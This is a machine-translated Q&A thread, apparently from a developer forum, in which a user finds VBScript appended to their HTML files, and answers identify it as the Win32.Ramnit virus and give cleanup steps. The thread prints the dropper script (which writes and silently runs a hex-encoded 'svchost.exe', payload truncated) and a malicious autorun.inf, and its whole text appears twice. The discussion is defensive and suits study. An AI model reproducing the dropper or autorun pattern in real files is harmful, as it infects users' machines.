这段 VB 代码是如何自动添加的?
How is this piece of VB code getting added automatically?
每当我在 Notepad++ 中几天后打开 JavaScript (.js) 或 HTML (.html) 文件时,会自动获得一个类似的 VB 脚本添加在最后。我强烈感觉这是某种病毒,有人可以指导我吗?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
我认为是病毒
因此,如果您没有杀毒软件,则需要安装杀毒软件。
我推荐免费:Microsoft Security Essentials or Avast.
此外,您可以下载特殊的防病毒实用程序,仅用于扫描而不是安装它 – Dr. Web CureIt!
然后对您的计算机进行全面扫描。
您应该检查所有启动命令并删除所有恶意命令。例如CCleaner Free 可以帮你查一下。
UPD
清理并删除启动命令后,您可以使用 sfc 实用程序。
Microsoft Windows Resource Checker
Scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.
运行 cmd 具有管理员权限,然后 运行 sfc /scannow 命令。
我还认为您的系统受到了某些病毒的影响。我想分享一个 link,我发现它符合你的问题,请仔细阅读,在这里我将 post link -->http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page
它 运行s 的文件是 %temp%\svchost.exe。
因此做一个tasklist
tasklist /svc /fi "imagename eq svchost.exe"
记下没有任何包含服务的 svchosts。将实际的 PID 放入 xxxx
taskkill /pid xxxx /pid xxxx /pid xxxx /f
这将停止该特定部分 运行ning。
病毒使用的技术无法可靠地工作,尤其是在非英语环境下 windows。
此外,不是删除它而是更改安全性以防止执行,直到您清理可能存在的其他部分。
icacls "%temp%\svchost.exe" /deny Everyone:F
这适用于 Vista,但广泛适用于所有版本。
病毒清理
如果您在正常模式下执行这些操作时遇到问题。尝试在带网络连接的安全模式下进行。
单击开始 - 所有程序 - 附件 - 运行 并键入
msconfig
然后转到“启动”选项卡并单击“安全启动”并勾选“网络”。重启。回到这里,取消勾选 Safe Boot 到 return 到正常模式。
安全扫描器
Microsoft Safety Scanner 是一款可免费下载的安全工具,它提供按需扫描并帮助删除病毒、间谍软件和其他恶意软件。它适用于您现有的防病毒软件。
http://www.microsoft.com/security/scanner/en-au/default.aspx
恶意软件删除工具
如果您无法下载或运行 Safety Scanner,Windows 有一个内置的小型防病毒程序。它只针对最常见的威胁。它会想要更新,不要让它更新。 运行 它没有更新。然后运行这次又更新了
单击开始 - 所有程序 - 附件 - 运行(或按 Winkey + R)。类型
mrt
重置防火墙
您可以将防火墙重置为默认设置。
开始 - 所有程序 - 附件 - 右键单击命令提示符并选择 运行 以管理员身份。键入(或通过右键单击命令提示符 window 并选择粘贴进行复制和粘贴)。
netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"
安全修复
Fixits 是 Microsoft 的故障排除程序。一共有27个。
自动修复 Windows 安全设置以确保您的 PC 安全
http://support.microsoft.com/mats/Malware_Prevention/en-us
和
修复安全问题以自动保护和保护Windows
http://support.microsoft.com/mats/windows_security_diagnostic/en-us
和
修复 Internet Explorer 问题,让 IE 快速、安全、稳定
http://support.microsoft.com/mats/ie_performance_and_safety/en-us
完整列表请访问
http://support.microsoft.com/fixit/en-us
当您选择下载它时,选择 运行 在另一台计算机上的选项。然后,您可以将其保存到硬盘的文件夹中。打开文件夹,打开文件夹 Fix it Portable,然后 运行 启动 Fix It。它将包含所有 27 个 Fixits。
全时防病毒
对于永久性防病毒软件,我们在论坛上注意到使用 Microsoft Security Essentials 的人完全没有问题。
http://www.microsoft.com/en-au/download/details.aspx?id=5201
如果所有其他方法都失败了
这个来自 Microsoft 的程序启动另一个基本的操作系统来清理 Windows。您需要将它放在 USB 或 DVD 上,然后从中启动。
http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline
查看有关威胁的详细信息
Microsoft 维护着一本病毒信息百科全书。
http://www.microsoft.com/security/portal/threat/threats.aspx
这是一种名为 Win32.Ramnit 的病毒
阅读此处的说明:
我刚刚在我客户的一台计算机上发现了这个病毒,这个病毒修改了我 USB 便携式硬盘中的所有 html 文件。
此脚本执行 VBScript 以创建文件并执行它并在此文件夹中安装程序:
C:\Program Files\Microsoft\DesktopLayer.exe
阅读更多:http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm
对于您插入这台受感染电脑的每个 USB 随身碟,病毒都会创建 2 个文件:
autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe
autorun.inf的内容:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
当这个 pendrive 插入另一台计算机时,试图执行病毒安装程序。
每当我在 Notepad++ 中几天后打开 JavaScript (.js) 或 HTML (.html) 文件时,会自动获得一个类似的 VB 脚本添加在最后。我强烈感觉这是某种病毒,有人可以指导我吗?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
我认为是病毒
因此,如果您没有杀毒软件,则需要安装杀毒软件。
我推荐免费:Microsoft Security Essentials or Avast.
此外,您可以下载特殊的防病毒实用程序,仅用于扫描而不是安装它 – Dr. Web CureIt!
然后对您的计算机进行全面扫描。
您应该检查所有启动命令并删除所有恶意命令。例如CCleaner Free 可以帮你查一下。
UPD
清理并删除启动命令后,您可以使用 sfc 实用程序。
Microsoft Windows Resource Checker
Scans the integrity of all protected system files and replaces incorrect versions with correct Microsoft versions.
运行 cmd 具有管理员权限,然后 运行 sfc /scannow 命令。
我还认为您的系统受到了某些病毒的影响。我想分享一个 link,我发现它符合你的问题,请仔细阅读,在这里我将 post link -->http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted-automatically-in-HTML-page
它 运行s 的文件是 %temp%\svchost.exe。
因此做一个tasklist
tasklist /svc /fi "imagename eq svchost.exe"
记下没有任何包含服务的 svchosts。将实际的 PID 放入 xxxx
taskkill /pid xxxx /pid xxxx /pid xxxx /f
这将停止该特定部分 运行ning。
病毒使用的技术无法可靠地工作,尤其是在非英语环境下 windows。
此外,不是删除它而是更改安全性以防止执行,直到您清理可能存在的其他部分。
icacls "%temp%\svchost.exe" /deny Everyone:F
这适用于 Vista,但广泛适用于所有版本。
病毒清理
如果您在正常模式下执行这些操作时遇到问题。尝试在带网络连接的安全模式下进行。
单击开始 - 所有程序 - 附件 - 运行 并键入
msconfig
然后转到“启动”选项卡并单击“安全启动”并勾选“网络”。重启。回到这里,取消勾选 Safe Boot 到 return 到正常模式。
安全扫描器
Microsoft Safety Scanner 是一款可免费下载的安全工具,它提供按需扫描并帮助删除病毒、间谍软件和其他恶意软件。它适用于您现有的防病毒软件。
http://www.microsoft.com/security/scanner/en-au/default.aspx
恶意软件删除工具
如果您无法下载或运行 Safety Scanner,Windows 有一个内置的小型防病毒程序。它只针对最常见的威胁。它会想要更新,不要让它更新。 运行 它没有更新。然后运行这次又更新了
单击开始 - 所有程序 - 附件 - 运行(或按 Winkey + R)。类型
mrt
重置防火墙
您可以将防火墙重置为默认设置。
开始 - 所有程序 - 附件 - 右键单击命令提示符并选择 运行 以管理员身份。键入(或通过右键单击命令提示符 window 并选择粘贴进行复制和粘贴)。
netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"
安全修复
Fixits 是 Microsoft 的故障排除程序。一共有27个。
自动修复 Windows 安全设置以确保您的 PC 安全
http://support.microsoft.com/mats/Malware_Prevention/en-us
和
修复安全问题以自动保护和保护Windows
http://support.microsoft.com/mats/windows_security_diagnostic/en-us
和
修复 Internet Explorer 问题,让 IE 快速、安全、稳定
http://support.microsoft.com/mats/ie_performance_and_safety/en-us
完整列表请访问
http://support.microsoft.com/fixit/en-us
当您选择下载它时,选择 运行 在另一台计算机上的选项。然后,您可以将其保存到硬盘的文件夹中。打开文件夹,打开文件夹 Fix it Portable,然后 运行 启动 Fix It。它将包含所有 27 个 Fixits。
全时防病毒
对于永久性防病毒软件,我们在论坛上注意到使用 Microsoft Security Essentials 的人完全没有问题。
http://www.microsoft.com/en-au/download/details.aspx?id=5201
如果所有其他方法都失败了
这个来自 Microsoft 的程序启动另一个基本的操作系统来清理 Windows。您需要将它放在 USB 或 DVD 上,然后从中启动。
http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline
查看有关威胁的详细信息
Microsoft 维护着一本病毒信息百科全书。
http://www.microsoft.com/security/portal/threat/threats.aspx
这是一种名为 Win32.Ramnit 的病毒 阅读此处的说明:
我刚刚在我客户的一台计算机上发现了这个病毒,这个病毒修改了我 USB 便携式硬盘中的所有 html 文件。
此脚本执行 VBScript 以创建文件并执行它并在此文件夹中安装程序:
C:\Program Files\Microsoft\DesktopLayer.exe
阅读更多:http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm
对于您插入这台受感染电脑的每个 USB 随身碟,病毒都会创建 2 个文件:
autorun.inf
\RECYCLER\<random GUID>\<random charx8>.exe
autorun.inf的内容:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
shell\explore\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
USEAUTOPLAY=1
shell\Open\command=.\RECYCLER\S-0-8-75-3728445372-7281148451-227621134-4236\ZDqdQKMm.exe
当这个 pendrive 插入另一台计算机时,试图执行病毒安装程序。